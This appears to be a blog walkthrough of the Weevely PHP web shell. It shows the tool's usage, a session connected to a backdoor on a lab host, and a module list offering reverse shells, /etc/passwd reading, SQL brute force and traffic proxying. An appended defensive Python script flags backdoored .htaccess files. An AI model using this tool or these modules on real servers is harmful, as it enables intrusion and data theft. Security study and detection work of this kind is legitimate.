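Weevely has been around for a while, so today I am trying it out. It is somewhat similar to China Chopper. The differences: the backdoor is encrypted, and it only deals with PHP backdoors.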
root@gnu:~# weevely
________ __
| | | |-----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|_____|____|___/|____|__|___ | v1.0
|_____|
Stealth tiny web shell
[+] Start ssh-like terminal session
weevely <url> <password>
[+] Run command directly from command line
weevely <url> <password> [ "<command> .." | :<module> .. ]
[+] Generate PHP backdoor
weevely generate <password> [ <path> ] ..
[+] Show credits
weevely credits
[+] Show available module and backdoor generators
weevely help
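There are three core functions: 1. generate a backdoor, 2. connect to the backdoor and execute commands (interactive), 3. connect to the backdoor and execute commands (non-interactive).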
root@gnu:~# weevely credits
Website
http://epinna.github.com/Weevely/
Author
Emilio Pinna
http://disse.cting.org
Contributors
Andrea Cardaci
http://cyrus-and.github.com/
Raffaele Forte, Backbox Linux
http://www.backbox.org
Simone Margaritelli
http://www.evilsocket.net/
root@gnu:~# weevely http://192.168.2.111/weevely.php password
________ __
| | | |-----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|_____|____|___/|____|__|___ | v1.0
|_____|
Stealth tiny web shell
[+] Welcome to Weevely. Browse filesystem and execute system commands.
[+] Use ':help' to list available modules and run selected one.
root@gnu:/var/www $ :help
+--------------------+------------------------------------------------------+
| generator | description |
+--------------------+------------------------------------------------------+
| :generate.img | Backdoor existing image and create related .htaccess |
| :generate.htaccess | Generate backdoored .htaccess. |
| :generate.php | Generate obfuscated PHP backdoor |
+--------------------+------------------------------------------------------+
+----------------------+-----------------------------------------------------------------------+
| module | description |
+----------------------+-----------------------------------------------------------------------+
| :audit.mapwebfiles | Enumerate webroot files properties |
| :audit.etcpasswd | Enumerate users and /etc/passwd content |
| :audit.userfiles | Enumerate common users restricted files |
| :shell.sh | System shell |
| :shell.php | PHP shell |
| :system.info | Collect system informations |
| :find.suidsgid | Find files with superuser flags |
| :find.perms | Find files with write, read, execute permissions |
| :backdoor.tcp | Open a shell on TCP port |
| :backdoor.reversetcp | Send reverse TCP shell |
| :bruteforce.sqlusers | Bruteforce all SQL users |
| :bruteforce.sql | Bruteforce SQL username |
| :file.upload2web | Upload binary/ascii file into web folders and guess corresponding url |
| :file.download | Download binary/ascii files from target filesystem |
| :file.read | Read files from target filesystem |
| :file.enum | Check remote files type, md5 and permission |
| :file.upload | Upload binary/ascii file to the target filesystem |
| :file.check | Check remote files type, md5 and permission |
| :file.rm | Remove remote files and folders |
| :sql.console | Execute SQL queries |
| :sql.dump | Get SQL database dump |
| :net.scan | Print interface addresses |
| :net.proxy | Install and run Proxy to tunnel traffic through target |
| :net.ifaces | Print interface addresses |
| :net.phpproxy | Install remote PHP proxy |
+----------------------+-----------------------------------------------------------------------+
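The generator table above lists :generate.img and :generate.htaccess, both of which leave a modified .htaccess in the web tree. As an added example (not part of the original post and not Weevely's own code), the following defender-side check audits .htaccess files for the general patterns such a file relies on. The page does not show the generated file's contents, so the three heuristics, the PHP_EXTS allowlist, the function names and the sample input are assumptions made for this illustration.

```python
import re
from pathlib import Path

# Extensions expected to run as PHP on this server (assumption; adjust per site).
PHP_EXTS = {".php", ".phtml", ".phar"}

# AddType/AddHandler lines whose MIME type or handler name mentions PHP.
HANDLER = re.compile(r"^\s*(?:AddType|AddHandler)\s+\S*php\S*\s+(.+)$", re.I)
# Per-directory override that makes PHP include a file on every request.
PREPEND = re.compile(r"^\s*php_value\s+auto_(?:prepend|append)_file\b", re.I)
# A PHP open tag anywhere in the file, including inside a '#' comment.
PHP_TAG = re.compile(r"<\?(?:php|=)", re.I)

def audit_htaccess(text):
    """Return [(line_number, finding)] for the contents of one .htaccess file."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = HANDLER.match(line)
        if m:
            exts = ["." + e.lstrip(".").lower() for e in m.group(1).split()]
            odd = [e for e in exts if e not in PHP_EXTS]
            if odd:
                findings.append((n, "php-handler-on:" + ",".join(odd)))
        if PREPEND.match(line):
            findings.append((n, "auto-prepend-file"))
        if PHP_TAG.search(line):
            findings.append((n, "php-code-in-htaccess"))
    return findings

def scan_webroot(root):
    """Audit every .htaccess under root; return {path: findings} for hits only."""
    hits = {}
    for path in Path(root).rglob(".htaccess"):
        found = audit_htaccess(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed sample input, not the output of any real tool.
SAMPLE = """Options -Indexes
AddType application/x-httpd-php .png
AddHandler application/x-httpd-php .php
php_value auto_prepend_file /tmp/x.inc
# <?php echo 1; ?>
"""

if __name__ == "__main__":
    for lineno, finding in audit_htaccess(SAMPLE):
        print(lineno, finding)
```

A hit is a lead for review rather than proof of compromise; compare flagged files against the deployed version of the site.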